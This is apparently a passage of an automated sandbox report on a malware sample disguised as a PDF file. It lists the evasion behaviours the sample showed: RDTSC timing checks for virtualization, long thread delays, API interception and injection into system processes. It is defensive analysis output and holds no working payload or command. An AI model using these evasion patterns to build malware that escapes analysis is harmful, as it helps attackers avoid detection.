Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Reads the DNS cache

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE3872 DnsGetCacheDataTableEx,DnsFree,DnsFree,

9_2_00DE3872

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D744

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: C49904 second address: C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: C49B7E second address: C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: C09904 second address: C0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: C09B7E second address: C09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 2CC9904 second address: 2CC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 2CC9B7E second address: 2CC9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory allocated: 29D371B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: 2653FB80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: 1EBFD450000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5007	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4808	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5190	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4752	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 771	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 744	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 1671	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 8297	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3699

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-21226

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API coverage: 2.2 %
Source: C:\Windows\SysWOW64\ipconfig.exe	API coverage: 2.3 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160	Thread sleep time: -10380000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160	Thread sleep time: -9504000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep count: 1671 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep time: -3342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep count: 8297 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep time: -16594000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7861C90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7D7861C90

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000007.00000000.2132972491.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000000.2132377434.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@]
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
